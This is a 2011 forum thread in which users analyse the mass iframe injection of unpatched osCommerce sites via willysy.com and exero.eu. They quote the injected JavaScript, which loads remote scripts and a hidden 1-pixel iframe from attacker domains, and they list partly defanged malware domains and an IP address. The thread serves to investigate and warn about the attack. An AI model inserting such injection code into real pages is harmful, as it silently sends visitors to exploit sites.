Broadband Tech > Security > Security > willysy .com Mass Injection - 1 million infected sites

willysy .com Mass Injection - 1 million infected sites

EDIT: Avast was flagging this post. I inserted spaces in the code and addresses to compensate.
Thanks to Ronnie_USA for cluing me in.
/

thanks noah vail..

"willysy.com" isn't resolving at the moment, which is good, but it is possible that it could pop back up at a new ip address..

reply to Noah Vail
I thought visiting some infected sites might be fun.

The first one tried to launch hxxp://c h r i s a l r u s s i a.ru/iframe.php?id=0xxnnc.....

Chrisalrussia.ru is an established domain but has been blackballed by a number of entities (ie:WoT) today.
It resolves to an IP hosted in the Czech Republic.
(Robtex info on chrisalrussia .ru)

and

The .js scripts from exero.eu are now redirecting to hxxp://a k t y n.com/jquery.js . It's at a Polish IP that became listed by WoT yesterday.
(Robtex info on aktyn .com)

If anyone is curious, the code from the .js script is as follows:
function xx() {
try {
if(document.readyState == "complete") {
var fr = document.createElement("script");
fr.src = "hxxp:// a k t y n.com/catalog/admin/includes/classes/etc/js2.php";
document.body.appendChild(fr);
var js = document.createElement("script");
js.src = "hxxp:// a k t y n.com/jquery.js?l=1";
document.body.appendChild(js);
} else {
setTimeout("xx()",300);
}
} catch(e) {
setTimeout("xx()",300);
}
}
xx();

NV

--
Adopting other people's animosity is The New Stupid.

reply to redwolfe_98

reply to Noah Vail

reply to Noah Vail
I'm visiting infected sites that google returned when searching for the javascript url at exero.eu. I'm sorting the results by date to (maybe) get the most recently indexed.

The infected page loads were carbon copies of the first I visited - until this last one.

This one starts off with
hxxp://e x e r o.eu/catalog/css.htm
that contains
<script type='text/javascript' src='hxxp://a d e p o r t e s.es/images/info/js/js.php'></script>
.

and that js.PHP contains the following
function vdeh() {
if(document.all.length > 3) {
var dch = document.createElement("iframe");
dch.id = "dchid";
dch.src = "http://l a b o u r c e.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34";
dch.style.width = "1px";
dch.style.height = "1px";
document.all[3].appendChild(dch);
} else {
setTimeout("vdeh()",500);
}
} setTimeout("vdeh()",500);

The labourc.ru domain is a few years old. I can't tell how long the server there has been online but my feeling is that it's the shell of a long abandoned project.

The PHP return is lengthy, maybe it contains a 404.
I pastebin'd it Here.

The CSS I mentioned above is Referenced @ Sec.nl in a Fri posting. So the above code was prob injected 3 or more days ago.

The main thing I get out of all this is that this infection may have tons of variation, pulling data from new domains every day or two.

and I'm listing what I find because DSLR is quickly indexed and this stuff might help someone else out.

The question is - when this bug runs out of unpatched osCommerce sites is that going to be the end of this?

NV

--
Adopting other people's animosity is The New Stupid.

reply to redwolfe_98

reply to Noah Vail
From:

7. Malware URL:
h t t p : / / 4 6 . 1 6 . 2 4 0 . 1 8 / 9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

7/43, »www.virustotal.com/file-scan/rep···12211494

reply to Noah Vail
What I'm confused by, is just what is this doing?

So a ton of websites [where's the "security" on that end!] have been injected with this hidden IFRAME.

And ... then what? What happens next?

Or are the sites I've visited just not displaying or doing anything (currently)?

h t t p://www.google.com/search?q=%22http%3A%2F%2Fwill ysy.com%2Fimages%2Fbanners%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a#sclient=psy&hl=en&client=seamonkey-a&rls=org.mozilla:en-US%3Aunofficial&source=hp&q=%22http:%2F%2Fwill ysy.com%2Fimages%2Fbanners%22&pbx=1&oq=%22http:%2F%2Fwill ysy.com%2Fimages%2Fbanners%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=19320l19320l0l19944l1l1l0l0l0l0l117l117l0.1l1l0&bav=on.2,or.r_gc.r_pw.&fp=da8c3ab7508c4c6a&biw=1280&bih=570

reply to therube

For what it's worth:

Recent tools from Greatis:

1.
Remove Willysy.com/images/banners infection from your website:
»greatis.com/security/willysy-com···oval.htm

2.
Remove Exero.eu/catalog/jquery infection from your website:
»greatis.com/security/exero-eu-we···oval.htm

Malware attack spreads to 5 million pages (and counting)

The mass attack, which compromises websites running unpatched versions of the osCommerce store-management web application, has spread virally over the past week. When researchers from web security firm Armorize first discovered it on July 24, Google search results suggested just 91,000 webpages were infected. As of Tuesday, those same search results showed the exploit had spread to almost 5 million pages.

According to Armorize, the attack exploits at least three osCommerce security flaws, one that was disclosed just three weeks ago. The vulnerabilities have allowed attackers using Ukrainian IP addresses to inject iframes into unpatched websites. The iframes silently redirect visitors to malicious files located on willysy.com and exero.eu. Those domain names, in turn redirect visitors to a series of intermediate websites that ultimately try to exploit several Windows vulnerabilities.

Visitors who haven't installed patches are then compromised, usually with no outward indication.

http://www.theregister.co.uk/2011/08/02/mass_injection_attack_goes_viral/

reply to Noah Vail
Is there any way to check on a website with respect to this malware?